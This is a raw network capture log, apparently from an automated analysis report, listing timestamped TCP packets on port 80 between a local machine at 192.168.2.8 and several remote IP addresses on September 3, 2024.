Sep 3, 2024 17:13:21.820930958 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.820934057 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.820945978 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.820956945 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.820985079 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.820985079 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.821000099 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.821266890 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.821278095 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.821289062 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.821300983 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.821311951 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.821317911 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.821321964 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.821351051 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.821362972 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.821527958 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.821541071 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.821551085 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.821566105 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.821576118 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.821587086 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.821587086 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.821589947 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.821602106 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.821613073 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.821623087 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.821634054 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.821634054 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.821646929 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.821656942 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.821657896 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.821671009 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.821681023 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.821691990 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.821692944 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.821692944 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.821705103 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.821707010 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.821722984 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.821727991 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.821738958 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.821753979 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.821768999 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.821804047 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.821829081 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.822208881 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.822218895 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.822235107 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.822269917 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.822273970 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.822305918 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.822313070 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.822323084 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.822334051 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.822345018 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.822355986 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.822362900 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.822362900 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.822400093 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.822400093 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.822556019 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.822566986 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.822577000 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.822587013 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.822597980 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.822606087 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.822607040 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.822618961 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.822624922 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.822626114 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.822635889 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.822645903 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.822659016 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.822660923 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.822675943 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.822686911 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.822735071 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.822828054 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.822902918 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.822958946 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.822969913 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.822982073 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.822993040 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.823000908 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.823009968 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.823023081 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.823024035 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.823030949 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.823035955 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.823048115 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.823059082 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.823069096 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.823096991 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.823096991 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.850608110 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.850636959 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.850661993 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.850694895 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.864298105 CEST	80	49735	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:21.864434004 CEST	49735	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:21.865250111 CEST	49735	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:21.870618105 CEST	80	49735	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:21.899899960 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.899912119 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.899921894 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.899961948 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.900011063 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.900152922 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.900165081 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.900175095 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.900203943 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.900233030 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.900270939 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.900281906 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.900293112 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.900302887 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.900310040 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.900326967 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.900350094 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.900445938 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.900456905 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.900465965 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.900476933 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.900501966 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.900511980 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.900526047 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.900544882 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.900556087 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.900568008 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.900593996 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.900605917 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.900669098 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.900679111 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.900696993 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.900707006 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.900712967 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.900736094 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.900767088 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.900767088 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.900913000 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.900923967 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.900933981 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.900944948 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.900955915 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.900959969 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.900969028 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.900991917 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.901010036 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.901127100 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.901139021 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.901149988 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.901160955 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.901171923 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.901175976 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.901184082 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.901195049 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.901206017 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.901227951 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.901258945 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.901271105 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.901281118 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.901308060 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.901308060 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.901321888 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.901326895 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.901334047 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.901345015 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.901371956 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.901386976 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.901567936 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.901578903 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.901590109 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.901599884 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.901611090 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.901628017 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.901633024 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.901642084 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.901642084 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.901664972 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.901675940 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.901823044 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.901833057 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.901843071 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.901854038 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.901870012 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.901875019 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.901881933 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.901892900 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.901905060 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.901931047 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.902070045 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.902081013 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.902122974 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.902137995 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.902215958 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.902225018 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.902235031 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.902245045 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.902255058 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.902262926 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.902266979 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.902280092 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.902290106 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.902291059 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.902302980 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.902312040 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.902313948 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.902328014 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.902338982 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.902365923 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.902395964 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.902554989 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.902564049 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.902574062 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.902585030 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.902590990 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.902600050 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.902609110 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.902612925 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.902626038 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.902630091 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.902645111 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.902672052 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.912808895 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.912818909 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.912828922 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.912875891 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.912880898 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.912893057 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.912902117 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.912913084 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.912935972 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.912935972 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.912951946 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.913029909 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.913060904 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.913218975 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.913229942 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.913239002 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.913249969 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.913270950 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.913307905 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.913424969 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.913435936 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.913445950 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.913456917 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.913469076 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.913480043 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.913481951 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.913491964 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.913507938 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.913532972 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.913572073 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.913582087 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.913592100 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.913625956 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.913638115 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.913805008 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.913815975 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.913825989 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.913870096 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.913968086 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.913979053 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.913989067 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.914036036 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.914036036 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.914072037 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.914083004 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.914093971 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.914103985 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.914115906 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.914125919 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.914128065 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.914136887 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.914149046 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.914161921 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.914161921 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.914202929 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.916838884 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.916850090 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.916860104 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.916891098 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.916922092 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.916924000 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.916934013 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.916945934 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.916958094 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.916992903 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.916992903 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.917143106 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.917154074 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.917164087 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.917176008 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.917187929 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.917198896 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.917203903 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.917212963 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.917224884 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.917231083 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.917237043 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.917239904 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.917249918 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.917265892 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.917265892 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.917301893 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.917526960 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.917537928 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.917548895 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.917557955 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.917561054 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.917574883 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.917586088 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.917598009 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.917608976 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.917608976 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.917622089 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.917622089 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.917634010 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.917650938 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.917654991 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.917664051 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.917689085 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.917725086 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.917889118 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.917900085 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.917910099 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.917920113 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.917936087 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.917948008 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.917958021 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.917959929 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.917960882 CEST	49730	80	192.168.2.8	52.212.52.84
